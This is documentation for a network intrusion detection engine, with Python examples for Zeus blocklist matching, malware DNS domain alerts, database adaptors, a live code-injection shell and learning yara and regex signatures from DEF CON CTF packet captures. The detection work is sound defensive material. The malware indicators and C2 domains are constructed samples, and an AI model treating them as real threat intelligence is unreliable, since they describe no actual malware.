The signatures generated by the system belong to the customer; their data is important for them, and some signatures could be extremely valuable for some organizations to identify certain attacks. The generated signatures can be stored in Yara format in order to be compatible with other systems.

rule generated_by_ngnids_engine {
    meta:
       author="ngnids"
       description="Flows generated on port 1986"
       date="9/4/2015"
    strings:
       $a="^\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a"
    condition:
       $a
}

Network Forensics

In some cases there is a need to generate evidence of a received attack or a specific network event. By using the EvidenceManager it is possible to record specific network conversations to files for network forensic analysis.

Real time interaction

The system has an embedded Ruby/Python interpreter similar to IPython, so the user can interact with the system without stopping the packet processing. This gives the engine the capability to inject any type of code, Ruby or Python, into the system in real time without interrupting the service. The possibilities this brings to the user are greater than with traditional engines, because there is direct interaction with the user in real time and there is no need to stop and start daemons or services.

Activating this functionality is as easy as setting the variable enable_shell to true.

with PacketDispatcher("eth0") as pd:
    pd.stack = st
    """ Enable the internal shell to interact with the engine """
    pd.enable_shell = True
    pd.run()

Packet engines integration

In some cases the engine needs to be integrated with a firewall or another packet engine. For this case the system allows injecting packets from other engines (Netfilter) into the system. By using this functionality, all the intelligence of the engine can be integrated into a firewall with the following simple steps.

# Assumption: Netfilter hands over IP packets, so a 14-byte Ethernet header is
# prepended so that the stack receives a complete Ethernet frame
ethernet_header = b"\x00" * 12 + b"\x08\x00"   # placeholder MACs, EtherType IPv4

def netfilter_callback(packet):

    payload = ethernet_header + packet.get_payload()
    length = packet.get_payload_len() + 14

    """ Use the forward_packet method of the PacketDispatcher object (pdis)
    in order to forward the packets from netfilter """
    pdis.forward_packet(payload, length)
    packet.accept()

Network anomalies

Some attacks are very dependent on the protocol in use. Incorrect header offsets, requests with no headers, invalid URL formats and so on are present on networks nowadays. The engine supports the following network anomaly detections:

  • IPv4 fragmentation.
  • IPv6 fragmentation.
  • IPv6 loop extension headers.
  • TCP bad flags and incorrect offset headers.
  • UDP incorrect offsets.
  • DNS incorrect headers and long names.
  • SMTP emails.
  • IMAP emails.
  • POP emails.
  • SNMP malformed headers.
  • SSL malformed headers.
  • HTTP malformed URI and no headers.
  • CoAP malformed headers.
  • RTP malformed headers.
  • MQTT malformed headers.
  • Netbios bogus headers.
  • DHCP bogus headers.

def my_function_for_http(flow):
    print("HTTP Anomaly detected")
    """ Some extra code here """

st.set_anomaly_callback(my_function_for_http, "HTTPProtocol")

The example above shows how to hook a callback to HTTP anomalies and build new detection functions on top of them.

Use cases and examples

This section contains examples and use cases that may help you with your own. If you have a use case that would be interesting to add, feel free to contribute it.

Zeus malware

Nowadays malware is growing fast on networks. With the following example we can attach the engine to a cloud environment and take advantage of the functionality the engine provides. Let's see the following example, detecting the Zeus malware:

We define two callbacks, one for the host domain and another for the URI. The list of hosts/URIs comes from the site https://zeustracker.abuse.ch/blocklist.php?download=compromised, but you can provide your own.

def callback_uri(flow):
    print("Zeus activity detected on flow",str(flow))

def callback_host(flow):
    h = flow.http_info
    if (h):
        host = str(h.host_name)
        if (host):
            print("Suspicious activity detected on flow",str(flow),host)

We use external malware data and load it into a DomainNameManager:

import pyaiengine

def loadZeusMalwareData():

    data = dict()
    # Load the hosts and URIs in memory
    # The list has been downloaded from https://zeustracker.abuse.ch/blocklist.php?download=compromised
    h_mng = pyaiengine.DomainNameManager()
    with open("zeus.dat") as f:
        for line in f.readlines():
            l = line.strip()
            b = l.find("/")
            if not l or b < 0:
                # Skip empty lines and entries without a URI part
                continue
            r_host = l[:b]
            r_uri = l[b:]
            if r_host not in data:
                h = pyaiengine.DomainName(r_host, r_host)
                s = pyaiengine.HTTPUriSet("Set for %s" % r_host)

                h.callback = callback_host
                h_mng.add_domain_name(h)
                h.http_uri_set = s

                s.callback = callback_uri
                data[r_host] = (h, s)

            data[r_host][1].add_uri(r_uri)

    return h_mng

Create a new virtual stack object, the one used on cloud environments, in the main program:

st = pyaiengine.StackVirtual()

Allocate the maximum number of TCP and UDP flows for the stack:

st.tcp_flows = 500000
st.udp_flows = 163840

Load the malware data on the HTTPProtocol and assign it to the stack:

st.set_domain_name_manager(loadZeusMalwareData(),"HTTPProtocol")

Open the network device, set the previous stack and run the engine:

with  pyaiengine.PacketDispatcher("eth0") as pd:
    pd.stack = st
    pd.run()
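The loader above relies on the blocklist being well formed. The following is an added example, not AIEngine code, that parses the same host/uri format defensively (comments, blank lines, entries with no path or no host) and then performs the lookup that the DomainName and HTTPUriSet pair performs, distinguishing a host-only match from a host-and-URI match. The blocklist and the requests are constructed; the hosts are not real indicators.

```python
# Added example, not AIEngine code: parser and matcher for the host/uri blocklist format.
SAMPLE_BLOCKLIST = """\
# constructed sample: comment lines and blank lines are ignored
bad.example.net/gate.php
bad.example.net/config.bin
BAD.example.net/gate.php
other.example.org/

no-slash-entry
/uri-without-host
"""


def parse_blocklist(text):
    """Return {host: set(uris)}. Hosts are lower-cased; lines without a '/'
    separator or with an empty host are skipped instead of mis-sliced."""
    data = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        pos = line.find("/")
        if pos <= 0:
            continue
        host, uri = line[:pos].lower(), line[pos:]
        data.setdefault(host, set()).add(uri)
    return data


def classify_request(blocklist, host, uri):
    """Mirror the two callbacks: 'uri' when host and URI both match (the
    HTTPUriSet callback), 'host' when only the host matches (the DomainName
    callback), None when the request is not on the list."""
    entries = blocklist.get(host.lower())
    if entries is None:
        return None
    # Try the full URI first, then the path alone: query strings on this
    # kind of list often vary per victim.
    path = uri.split("?", 1)[0]
    return "uri" if (uri in entries or path in entries) else "host"


def scan(blocklist, requests):
    """Run (src_ip, host, uri) tuples through the matcher and return the hits."""
    hits = []
    for src_ip, host, uri in requests:
        verdict = classify_request(blocklist, host, uri)
        if verdict:
            hits.append((src_ip, host, uri, verdict))
    return hits


SAMPLE_REQUESTS = [  # constructed HTTP requests
    ("10.1.1.5", "bad.example.net", "/gate.php?id=1"),
    ("10.1.1.6", "bad.example.net", "/index.html"),
    ("10.1.1.7", "other.example.org", "/"),
    ("10.1.1.8", "good.example.com", "/gate.php"),
]

if __name__ == "__main__":
    bl = parse_blocklist(SAMPLE_BLOCKLIST)
    for hit in scan(bl, SAMPLE_REQUESTS):
        print("%s -> %s%s (%s match)" % hit)
```

The host-only verdict is the one that deserves attention in the engine's callback_host above: it fires for any URI on a listed host, so a busy shared host on the list can produce a lot of noise unless the URI set is consulted as well.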

Virtual/Cloud malware based detection

Nowadays data centers manage hundreds of virtual machines and networks. In the following example we configure the system to monitor malware domains on different virtual networks. Let's see how it works.

We define a callback function for the detection that sends an alarm through syslog:

import syslog

def malware_dns_callback(flow):

  d = flow.dns_info
  if (d):
    # flow.tag is reported as the network id of the alarm
    syslog.syslog(syslog.LOG_ERR,
      "Malware on ip %s domain %s network id %d" % (flow.src_ip,d.domain_name,flow.tag))

We use an external list of malware domains and add it to a DomainNameManager class in the same way as in the mobile malware example. We also create a list of common domains that we don't want to track:

def loadUnwantedDomains():

  dm = pyaiengine.DomainNameManager()

  dom = pyaiengine.DomainName("Facebook",".facebook.com")
  dm.add_domain_name(dom)
  dom = pyaiengine.DomainName("Google",".google.com")
  dm.add_domain_name(dom)
  # Add more common domains

  return dm

Create a new virtual stack to attach the managers to:

st = pyaiengine.StackVirtual()

Allocate the maximum number of flows on the UDP stack:

st.udp_flows = 1638400

Load the malware domains and the unwanted domains and assign them to the stack; the False flag marks the second manager as the list of domains we don't want to track:

st.set_domain_name_manager(loadBadDomains(),"DNSProtocol")
st.set_domain_name_manager(loadUnwantedDomains(),"DNSProtocol", False)

Open the network device and run the engine:

with pyaiengine.PacketDispatcher("eth0") as pd:
    pd.stack = st
    pd.run()
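The entries above are suffixes (".facebook.com" covers every name under facebook.com), and the two managers are combined so that an unwanted domain is never reported. The following is an added example, not AIEngine code, that implements that suffix matching and the combination of a blocked list with a not-tracked list, producing the same alarm text as malware_dns_callback but collecting it in a list instead of sending it to syslog. The Flow and DNSInfo stand-ins, the malware suffixes and the queries are all constructed.

```python
# Added example, not AIEngine code: suffix matching for DomainName-style entries
# plus blocked/not-tracked combination. Assumption: flows expose src_ip,
# dns_info.domain_name and tag, as malware_dns_callback above uses.
from collections import namedtuple

DNSInfo = namedtuple("DNSInfo", ["domain_name"])
Flow = namedtuple("Flow", ["src_ip", "dns_info", "tag"])  # tag: virtual network id


class SuffixDomainSet:
    """Named set of domain suffixes with most-specific-suffix lookup."""

    def __init__(self, name):
        self.name = name
        self.labels = {}  # suffix (with leading dot) -> label

    def add(self, label, suffix):
        if not suffix.startswith("."):
            suffix = "." + suffix
        self.labels[suffix.lower()] = label

    def match(self, qname):
        """Return the label of the longest suffix matching qname, or None.
        '.example.com' matches 'example.com' itself and every name under it,
        but not 'notexample.com'."""
        q = qname.lower().rstrip(".")
        best = None
        for suffix, label in self.labels.items():
            if q == suffix[1:] or q.endswith(suffix):
                if best is None or len(suffix) > len(best[0]):
                    best = (suffix, label)
        return best[1] if best else None


class DNSMonitor:
    def __init__(self, blocked, untracked):
        self.blocked = blocked
        self.untracked = untracked
        self.alarms = []

    def callback(self, flow):
        """Return the matching malware label, or None when nothing is reported."""
        d = flow.dns_info
        if not d:
            return None
        # Domains on the not-tracked list never raise an alarm.
        if self.untracked.match(d.domain_name):
            return None
        label = self.blocked.match(d.domain_name)
        if label is None:
            return None
        self.alarms.append("Malware on ip %s domain %s network id %d"
                           % (flow.src_ip, d.domain_name, flow.tag))
        return label


def build_monitor():
    blocked = SuffixDomainSet("Malware domains")
    blocked.add("C2 family A", ".c2-a.example")     # constructed
    blocked.add("C2 family B", "dropper.example")   # constructed, leading dot added
    untracked = SuffixDomainSet("Unwanted domains")
    untracked.add("Facebook", ".facebook.com")
    untracked.add("Google", ".google.com")
    return DNSMonitor(blocked, untracked)


def run(monitor, flows):
    return [monitor.callback(f) for f in flows]


SAMPLE_FLOWS = [  # constructed DNS queries on two virtual networks
    Flow("10.2.0.4", DNSInfo("beacon.c2-a.example"), 7),
    Flow("10.2.0.5", DNSInfo("www.google.com"), 7),
    Flow("10.2.0.6", DNSInfo("dropper.example."), 9),
    Flow("10.2.0.7", None, 9),
    Flow("10.2.0.8", DNSInfo("notc2-a.example"), 7),
]

if __name__ == "__main__":
    m = build_monitor()
    print(run(m, SAMPLE_FLOWS))
    for alarm in m.alarms:
        print(alarm)
```

The last sample query shows why the comparison keeps the leading dot: "notc2-a.example" ends with "c2-a.example" but is not under that domain and must not match.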

Database integration

One of the main functions of the engine is its easy integration with databases. Let's see some examples of how the database interface works.

In the first example we use Redis (http://redis.io/). We create a class called redisAdaptor that implements the methods update, insert and remove. For every new flow that the system receives the method insert is called; update is called according to the sampling selected and remove when the flow is destroyed.

import pyaiengine
import redis

class redisAdaptor(pyaiengine.DatabaseAdaptor):
    def __init__(self):
        self.__r = None

    def connect(self,connection_str):
        self.__r = redis.Redis(connection_str)

    def update(self,key,data):
        self.__r.hset("udpflows",key,data)

    def insert(self,key):
        self.__r.hset("udpflows",key,"{}")

    def remove(self,key):
        self.__r.hdel("udpflows",key)

As a second example you can use Cassandra (https://cassandra.apache.org/):

import pyaiengine
import pycassa
import json

class cassandraAdaptor(pyaiengine.DatabaseAdaptor):
    """ This class inherits from DatabaseAdaptor and implements
        the following methods:
        - insert, called on the first insertion of the network flow
        - update, called depending on the sample selected.
        - remove, called when the flow is destroyed.
    """
    def __init__(self):
        self.__c = None
        self.__pool = None

    def connect(self,connection_str):
        self.__pool = pycassa.ConnectionPool(keyspace='demo', server_list=['127.0.0.1:9160'], prefill=False)
        self.__c = pycassa.ColumnFamily(self.__pool, 'flows')

    def update(self,key,data):
        obj = json.loads(data)

        bytes = obj["bytes"]
        l7 = obj["layer7"]

        # Create a dict with all the values of the cassandra table
        d = {'bytes':bytes,'layer7':l7}

        # The layer 7 information is the HTTP host or, if absent, the SSL host
        l7info = obj.get("httphost",None)
        if (not l7info):
            l7info = obj.get("sslphost",None)
        if (l7info):
            d["layer7info"] = l7info

        self.__c.insert(key,d)

    def insert(self,key):
        self.__c.insert(key,{'bytes':0})

    def remove(self,key):
        # We dont remove anything on this example
        pass

Or use Hadoop with the PyTables(https://pytables.github.io/) interface.

import pyaiengine
import tables
import json

class hadoopFlow(tables.IsDescription):
    name = tables.StringCol(50,pos = 1)
    bytes = tables.Int32Col(pos = 2)
    l7 = tables.StringCol(32,pos = 3)
    layer7info = tables.StringCol(64, pos = 4)

class hadoopAdaptor(pyaiengine.DatabaseAdaptor):
    def __init__(self):
        self.__file = None
        self.__group = None
        self.__table_tcp = None
        self.__table_udp = None

    def connect(self,connection_str):
        self.__file = tables.open_file(connection_str, mode="w")
        self.__group = self.__file.create_group(self.__file.root, "flows")
        self.__table_tcp = self.__file.create_table(self.__group, 'table_tcp', hadoopFlow, "Flow table",
        tables.Filters(0))
        self.__table_udp = self.__file.create_table(self.__group, 'table_udp', hadoopFlow, "Flow table",
        tables.Filters(0))

    def __update_row(self,table,key,obj,l7info):
        # Find the row of the flow by its key and refresh the counters
        query = "name == b'%s'" % key
        for f in table.where(query):
            f['bytes'] = obj["bytes"]
            f['l7'] = obj["layer7"]
            if (l7info):
                f['layer7info'] = l7info

            f.update()
        table.flush()

    def __handle_tcp(self,key,obj):
        # On TCP the layer 7 information is the HTTP host or the SSL host
        l7info = obj.get("httphost",None) or obj.get("sslphost",None)
        self.__update_row(self.__table_tcp,key,obj,l7info)

    def __handle_udp(self,key,obj):
        # On UDP the layer 7 information is the DNS domain
        self.__update_row(self.__table_udp,key,obj,obj.get("dnsdomain",None))

    def update(self,key,data):
        try:
            obj = json.loads(data)
        except ValueError:
            print("ERROR:",data)
            return

        # The key has the form src_ip:src_port:proto:dst_ip:dst_port
        proto = int(key.split(":")[2])

        if (proto == 6):
            self.__handle_tcp(key,obj)
        else:
            self.__handle_udp(key,obj)

    def insert(self,key):
        proto = int(key.split(":")[2])

        if (proto == 6):
            t = self.__table_tcp
        else:
            t = self.__table_udp

        f = t.row

        f['name'] = key
        f['bytes'] = 0
        f.append()
        t.flush()

    def remove(self,key):
        # We dont remove anything on this example
        pass

We create a new instance of a LAN network stack in the main program:

st = pyaiengine.StackLan()

Allocate the maximum number of UDP flows on the system:

st.udp_flows = 163840

Create a new instance of the DatabaseAdaptor and plug it into the UDP part of the engine, so only UDP traffic will be processed:

# Use your own adaptor (redisAdaptor, cassandraAdaptor, hadoopAdaptor)
db = redisAdaptor()
db.connect("localhost")

st.set_udp_database_adaptor(db,16)

Open the network device, attach the stack and let the engine run:

with pyaiengine.PacketDispatcher("eth0") as pd:
    pd.stack = st
    pd.run()

Now you can check the results on the redis/cassandra/hadoop database.
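All three adaptors receive the same two things from the engine: a flow key of the form src_ip:src_port:proto:dst_ip:dst_port (the hadoopAdaptor splits it on ":") and a JSON document with fields such as bytes, layer7, httphost, sslphost and dnsdomain. The following is an added example, not AIEngine code, of an in-memory adaptor with the same insert/update/remove contract that decodes both; it does not subclass pyaiengine.DatabaseAdaptor so that it runs offline, and the keys and JSON documents it is fed are constructed. It also shows two edge cases the adaptors above ignore: malformed JSON and a key that cannot be split unambiguously.

```python
# Added example, not AIEngine code: in-memory DatabaseAdaptor-style class.
import json

L7INFO_FIELDS = ("httphost", "sslphost", "dnsdomain")  # field names used by the adaptors above


def parse_flow_key(key):
    """Decode an IPv4 flow key 'src_ip:src_port:proto:dst_ip:dst_port'.
    IPv6 addresses contain ':' themselves, so a plain split is ambiguous
    for them; such keys are rejected rather than mis-parsed."""
    parts = key.split(":")
    if len(parts) != 5:
        raise ValueError("unsupported flow key: %r" % key)
    src_ip, src_port, proto, dst_ip, dst_port = parts
    return {"src_ip": src_ip, "src_port": int(src_port), "proto": int(proto),
            "dst_ip": dst_ip, "dst_port": int(dst_port)}


class MemoryAdaptor:
    def __init__(self):
        self.flows = {}
        self.errors = 0

    def connect(self, connection_str):
        pass  # nothing to connect to in memory

    def insert(self, key):
        rec = parse_flow_key(key)
        rec.update({"bytes": 0, "layer7": None, "layer7info": None})
        self.flows[key] = rec

    def update(self, key, data):
        try:
            obj = json.loads(data)
        except ValueError:
            self.errors += 1  # count instead of crashing the engine callback
            return
        if key not in self.flows:
            self.insert(key)  # tolerate an update arriving before insert
        rec = self.flows[key]
        rec["bytes"] = int(obj.get("bytes", rec["bytes"]))
        rec["layer7"] = obj.get("layer7", rec["layer7"])
        for field in L7INFO_FIELDS:
            if obj.get(field):
                rec["layer7info"] = obj[field]
                break

    def remove(self, key):
        self.flows.pop(key, None)

    def top_by_bytes(self, n=3):
        ranked = sorted(self.flows.items(), key=lambda kv: kv[1]["bytes"], reverse=True)
        return [(k, v["bytes"], v["layer7info"]) for k, v in ranked[:n]]


SAMPLE_EVENTS = [  # constructed (method, key, data) in the order the engine would call them
    ("insert", "172.16.1.126:49158:6:184.107.174.122:80", None),
    ("update", "172.16.1.126:49158:6:184.107.174.122:80",
     '{"bytes": 270383, "layer7": "http", "httphost": "example.test"}'),
    ("insert", "10.0.0.2:5353:17:10.0.0.1:53", None),
    ("update", "10.0.0.2:5353:17:10.0.0.1:53",
     '{"bytes": 120, "layer7": "dns", "dnsdomain": "example.test"}'),
    ("update", "10.0.0.2:5353:17:10.0.0.1:53", "not json"),
    ("remove", "10.0.0.2:5353:17:10.0.0.1:53", None),
]


def replay(adaptor, events):
    for method, key, data in events:
        if method == "update":
            adaptor.update(key, data)
        else:
            getattr(adaptor, method)(key)
    return adaptor


if __name__ == "__main__":
    a = replay(MemoryAdaptor(), SAMPLE_EVENTS)
    print(a.top_by_bytes(), "errors:", a.errors)
```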

Injecting code on the engine

One of the cool features of the engine is the ability to change its behavior while it is executing. The best way to understand this feature is with a proper example. We load the library and create a StackLan object with some memory requirements:

import pyaiengine

st = pyaiengine.StackLan()

st.tcp_flows = 32768
st.udp_flows = 56384

Just for the example we are going to create 3 DNS rules for handling queries:

d1 = pyaiengine.DomainName("Generic net queries",".net")
d2 = pyaiengine.DomainName("Generic com queries",".com")
d3 = pyaiengine.DomainName("Generic org queries",".org")

dm = pyaiengine.DomainNameManager()

""" Add the DomainName objects to the manager """
dm.add_domain_name(d1)
dm.add_domain_name(d2)
dm.add_domain_name(d3)

st.set_domain_name_manager(dm,"DNSProtocol")

Now we open a new PacketDispatcher context and enable the shell for interacting with the engine:

with pyaiengine.PacketDispatcher("enp0s25") as pd:
    pd.stack = st
    """ We enable the shell for interact with the engine """
    pd.enable_shell = True
    pd.run()

If we execute this code we will see the following messages:

[luis@localhost ai]$ python example.py
[09/30/16 21:48:41] Lan network stack ready.
AIEngine 1.6 shell
[09/30/16 21:48:41] Processing packets from device enp0s25
[09/30/16 21:48:41] Stack 'Lan network stack' using 51 MBytes of memory

>>>

Now we are in the internal shell of the engine and can access the different components:

>>> print(dm)
DomainNameManager (Generic Domain Name Manager)
        Name:Generic net queries      Domain:.net     Matchs:10
        Name:Generic org queries      Domain:.org     Matchs:0
        Name:Generic com queries      Domain:.com     Matchs:21

>>>

And now we inject a callback function for one of the given domains:

>>> def my_callback(flow):
...   d = flow.dns_info
...   if (d):
...     print(str(d))
...
>>> d3.callback = my_callback
>>>

And wait for domains that end in .org:

>>>  Domain:www.gnu.org

We can also verify the rest of the components:

>>> print(d3)
Name:Generic org queries      Domain:.org     Matchs:1        Callback:<function my_callback 0x023ffeea378>
>>> print(dm)
DomainNameManager (Generic Domain Name Manager)
        Name:Generic net queries      Domain:.net     Matchs:14
        Name:Generic org queries      Domain:.org     Matchs:1        Callback:<function my_callback 0x023ffeea378>
        Name:Generic com queries      Domain:.com     Matchs:21

Extracting information

Using the traces from DEF CON 21 we will try to find signatures in an easy way.

To extract information we use the FrequencyEngine and the LearnerEngine. These two engines allow us to find signatures of unknown traffic such as new malware, traffic signatures and so on. The relevant command-line options are:

Frequencies optional arguments:
  -F [ --enable-frequencies ]        Enables the Frequency engine.
  -g [ --group-by ] arg (=dst-port)  Groups frequencies by
                                     src-ip,dst-ip,src-port and dst-port.
  -f [ --flow-type ] arg (=tcp)      Uses tcp or udp flows.
  -L [ --enable-learner ]            Enables the Learner engine.
  -k [ --key-learner ] arg (=80)     Sets the key for the Learner engine.
  -b [ --buffer-size ] arg (=64)     Sets the size of the internal buffer for
                                     generate the regex.
  -y [ --enable-yara ]               Generates a yara signature.

First we look at the traffic distribution grouped by destination IP:

./aiengine -i /defcon21/european_defcon/  -F -g dst-ip
3 [0x7f2ec98fe760] INFO aiengine.stacklan null - Lan network stack ready.
1167 [0x7f2ec98fe760] INFO aiengine.stacklan null - Enable FrequencyEngine on Lan network stack
1168 [0x7f2ec98fe760] INFO aiengine.packetdispatcher null - processing packets from:/defcon21/european_defcon//euronop_00092_20130802191248.cap
1586 [0x7f2ec98fe760] INFO aiengine.packetdispatcher null - processing packets from:/defcon21/european_defcon//euronop_00031_20130802140748.cap
1612 [0x7f2ec98fe760] INFO aiengine.packetdispatcher null - processing packets from:/defcon21/european_defcon//euronop_00049_20130802153748.cap
...
Aggregating frequencies by destination IP
Computing frequencies by destination IP
Frequency Group(by destination IP) total frequencies groups:32
      Total process flows:30599
      Total computed frequencies:32
      Key                    Flows      Bytes      Dispersion Enthropy
      10.3.1.5               292        867421     12         0
      10.5.1.2               650        2661026    48         0
      10.5.10.2              645        1583049    40         0
      10.5.11.2              675        1778046    41         0
      10.5.12.2              670        9860998    42         0
      10.5.13.2              664        2852632    48         0
      10.5.14.118            9          276131     89         -105.036
      10.5.14.119            2          703        14         0
      10.5.14.12             1          2511       44         0
      10.5.14.2              649        2927839    48         0
      10.5.15.2              640        1852931    44         0
      10.5.16.2              665        2835281    40         0
      10.5.17.2              676        5620496    48         0
      10.5.18.2              664        1710898    41         0
      10.5.19.2              676        1797309    43         0
      10.5.2.2               671        1494479    41         0
      10.5.20.2              647        1502374    39         0
      10.5.3.2               668        1676005    41         0
      10.5.4.2               658        5795289    52         0
      10.5.5.2               675        1533368    37         0
      10.5.6.2               662        7079837    47         0
      10.5.7.12              1          1661       27         0
      10.5.7.13              4          322        4          0
      10.5.7.15              3          2265       9          0
      10.5.7.17              90         247224     44         0
      10.5.7.2               17590      220311075  30         0
      10.5.8.2               679        2201575    40         0
      10.5.8.25              5          20882      56         0
      10.5.9.13              1          1537       38         0
      10.5.9.14              2          699        15         0
      10.5.9.16              2          699        15         0
      10.5.9.2               663        2468757    48         0

So aiengine has been able to analyze 30599 TCP flows and group them under 32 IPs. Now let's take an IP with many flows and bytes, for example 10.5.7.2, and run aiengine again with a different grouping, passing that IP as the key of the LearnerEngine:

./aiengine -i /defcon21/european_defcon/  -F -g dst-ip -L -k "10.5.7.2"
...
Aggregating 17590 to the LearnerEngine
Regular expression generated with key:10.5.7.2
Regex:^\x5b\x45\x52\x52\x4f\x52\x5d\x20\x69\x70\x76\x34\x20\x62\x69\x6e\x64\x28\x29\x20\x66\x61\x69\x6c\x65\x64\x20\x36\x32\x0a\x5d\x20\x69\x70\x76\x34\x20\x62\x69\x6e\x64\x28\x29\x20\x66\x61\x69\x6c\x65\x64\x20\x36\x32\x0a\x5b\x45\x52\x52\x4f\x52\x5d\x20\x69\x70
Ascii buffer:[ERROR] ipv4 bind() failed 62
] ipv4 bind() failed 62
[ERROR] ip

So it seems that the machine 10.5.7.2 is generating some kind of bind error. It doesn't make much sense, but the regex generated is valid for identifying that traffic.

Let's analyze another directory:

./aiengine -i /pwningyeti/  -F -g dst-ip,dst-port
5 [0x7f6583946760] INFO aiengine.stacklan null - Lan network stack ready.
1164 [0x7f6583946760] INFO aiengine.stacklan null - Enable FrequencyEngine on Lan network stack
1189 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/pwningyeti//pwningyeti_00001_20130802113656.cap
1199 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/pwningyeti//pwningyeti_00001_20130802113748.cap
1203 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/wningyeti//pwningyeti_00002_20130802113659.cap
1208 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/pwningyeti//pwningyeti_00002_20130802114248.cap
...
Aggregating frequencies by destination IP and port
Computing frequencies by destination IP and port
Frequency Group(by destination IP and port) total frequencies groups:156
      Total process flows:8755
      Total computed frequencies:156
      Key                    Flows      Bytes      Dispersion Enthropy
      10.3.1.5:443           3482       16521854   15         0
      10.5.14.2:34872        1          15275      17         0
      10.5.17.250:53230      1          74         3          0
      10.5.17.250:54359      1          3949       26         0
      10.5.17.250:54555      1          3949       26         0
      10.5.17.250:57654      1          390        11         0
      10.5.17.250:57711      1          390        11         0
      10.5.17.250:57718      1          390        11         0
      10.5.17.250:58251      1          6521       39         0
      10.5.17.250:58328      1          159        3          0
      10.5.17.250:58952      1          1998       19         0
      10.5.17.250:60286      1          37         3          0
      10.5.17.2:1011         2          16632      9          -8.75489
      10.5.17.2:10215        1          984        9          0
      10.5.17.2:1025         1          1620       5          0
      10.5.17.2:1029         1          13944      9          -47.6257

And now we choose a destination IP and port as the key:

./aiengine -i /pwningyeti/  -F -g dst-ip,dst-port -L -k 10.5.17.2:4321
5 [0x7f6583946760] INFO aiengine.stacklan null - Lan network stack ready.
1164 [0x7f6583946760] INFO aiengine.stacklan null - Enable FrequencyEngine on Lan network stack
1189 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/pwningyeti//pwningyeti_00001_20130802113656.cap
1199 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/pwningyeti//pwningyeti_00001_20130802113748.cap
1203 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/wningyeti//pwningyeti_00002_20130802113659.cap
1208 [0x7f6583946760] INFO aiengine.packetdispatcher null - processing packets from:/tmp/pwningyeti//pwningyeti_00002_20130802114248.cap
...
Aggregating frequencies by destination IP and port
...
Aggregating 1675 to the LearnerEngine
Regular expression generated with key:10.5.17.2:4321
Regex:^\x43\x6f\x6e\x6e\x65\x63\x74\x20\x74\x6f\x20\x35\x8b\x52\x30\x8b\x20\x74\x6f\x20\x76\x69\x65\x77\x20\x74\x68\x65\x20\x64\x69\x73\x70\x6c\x61\x79\x2e\x0a\x31\x20\x29\x20\x43\x68\x61\x6e\x67\x65\x20\x64\x69\x73\x70\x6c\x61\x79\x20\x74\x65\x78\x74\x2e\x0a\x32
Ascii buffer:Connect to 5<8b>R0<8b> to view the display.
1 ) Change display text.
2
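The regex the LearnerEngine prints is a literal prefix written as \xNN escapes, and the "Ascii buffer" line is the same bytes rendered for humans. The following is an added example, not AIEngine code, that decodes the two regexes printed above back to bytes, reproduces the ASCII rendering (non-printable bytes as <hh>, as the 0x8b bytes appear in the second run), compiles the prefix as a payload matcher and emits a yara rule from the same bytes, which is what the -y option produces (the rule layout here is mine, not the engine's). REGEX_BIND and REGEX_YETI are copied from the runs above; the sample payloads are constructed.

```python
# Added example, not AIEngine code: decode and reuse LearnerEngine regexes.
import re

# Copied from the two runs above (key 10.5.7.2 and key 10.5.17.2:4321).
REGEX_BIND = r"^\x5b\x45\x52\x52\x4f\x52\x5d\x20\x69\x70\x76\x34\x20\x62\x69\x6e\x64\x28\x29\x20\x66\x61\x69\x6c\x65\x64\x20\x36\x32\x0a\x5d\x20\x69\x70\x76\x34\x20\x62\x69\x6e\x64\x28\x29\x20\x66\x61\x69\x6c\x65\x64\x20\x36\x32\x0a\x5b\x45\x52\x52\x4f\x52\x5d\x20\x69\x70"
REGEX_YETI = r"^\x43\x6f\x6e\x6e\x65\x63\x74\x20\x74\x6f\x20\x35\x8b\x52\x30\x8b\x20\x74\x6f\x20\x76\x69\x65\x77\x20\x74\x68\x65\x20\x64\x69\x73\x70\x6c\x61\x79\x2e\x0a\x31\x20\x29\x20\x43\x68\x61\x6e\x67\x65\x20\x64\x69\x73\x70\x6c\x61\x79\x20\x74\x65\x78\x74\x2e\x0a\x32"


def learner_regex_to_bytes(regex):
    """Turn '^\\xNN\\xNN...' into raw bytes, refusing anything that is not a plain hex escape."""
    body = regex[1:] if regex.startswith("^") else regex
    tokens = re.findall(r"\\x([0-9a-fA-F]{2})", body)
    if len(tokens) * 4 != len(body):
        raise ValueError("not a pure \\xNN byte sequence")
    return bytes(int(t, 16) for t in tokens)


def ascii_buffer(raw):
    """Printable ASCII and newlines as-is, every other byte as <hh>."""
    return "".join(chr(b) if b == 0x0A or 0x20 <= b < 0x7F else "<%02x>" % b for b in raw)


def compile_prefix(regex):
    """Bytes pattern anchored at the start of the payload, as the leading '^' requires."""
    return re.compile(rb"^" + re.escape(learner_regex_to_bytes(regex)), re.DOTALL)


def yara_rule(name, regex):
    """Minimal yara rule: the learned prefix must appear at offset 0 of the data."""
    hexpairs = " ".join("%02x" % b for b in learner_regex_to_bytes(regex))
    return ("rule %s\n{\n    strings:\n        $prefix = { %s }\n"
            "    condition:\n        $prefix at 0\n}\n" % (name, hexpairs))


SAMPLE_PAYLOADS = [  # constructed TCP payloads
    b"[ERROR] ipv4 bind() failed 62\n] ipv4 bind() failed 62\n[ERROR] ipv4 bind() failed 62\n",
    b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n",
    b"Connect to 5\x8bR0\x8b to view the display.\n1 ) Change display text.\n2 ) Quit\n",
]


def classify(payloads):
    """Label each payload with the learner signature it matches, or None."""
    matchers = {"bind_error": compile_prefix(REGEX_BIND),
                "yeti_menu": compile_prefix(REGEX_YETI)}
    return [next((n for n, m in matchers.items() if m.match(p)), None) for p in payloads]


if __name__ == "__main__":
    for name, regex in (("bind_error", REGEX_BIND), ("yeti_menu", REGEX_YETI)):
        print(name, "->", repr(ascii_buffer(learner_regex_to_bytes(regex))))
    print(classify(SAMPLE_PAYLOADS))
    print(yara_rule("bind_error", REGEX_BIND))
```

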